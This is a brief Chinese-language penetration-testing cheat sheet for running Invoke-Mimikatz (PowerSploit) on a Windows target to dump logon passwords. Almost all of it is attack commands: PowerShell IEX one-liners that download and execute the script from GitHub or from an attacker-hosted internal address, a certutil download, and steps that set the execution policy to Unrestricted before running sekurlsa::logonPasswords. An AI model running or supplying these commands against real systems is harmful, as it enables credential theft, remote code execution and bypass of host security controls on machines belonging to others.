参照:https://blog.51cto.com/simeon/2126106
进行实现
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1(1)目标主机具备网络环境
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
(2)目标主机不具备网络环境
powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.26.32.106:8000/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
(3)把文件下载到目标主机进行执行
#使用certutil下载
certutil.exe -urlcache -split -f "http://10.26.32.106:8000/Invoke-Mimikatz.ps1"
#执行Mimikatz
powershell Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'
有授权限制的:
Get-ExecutionPolicy //结果显示restricted
Set-ExecutionPolicy Unrestricted //打开限制
Import-Module .\Invoke-Mimikatz.ps1 //导入命令
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"' //获取密码
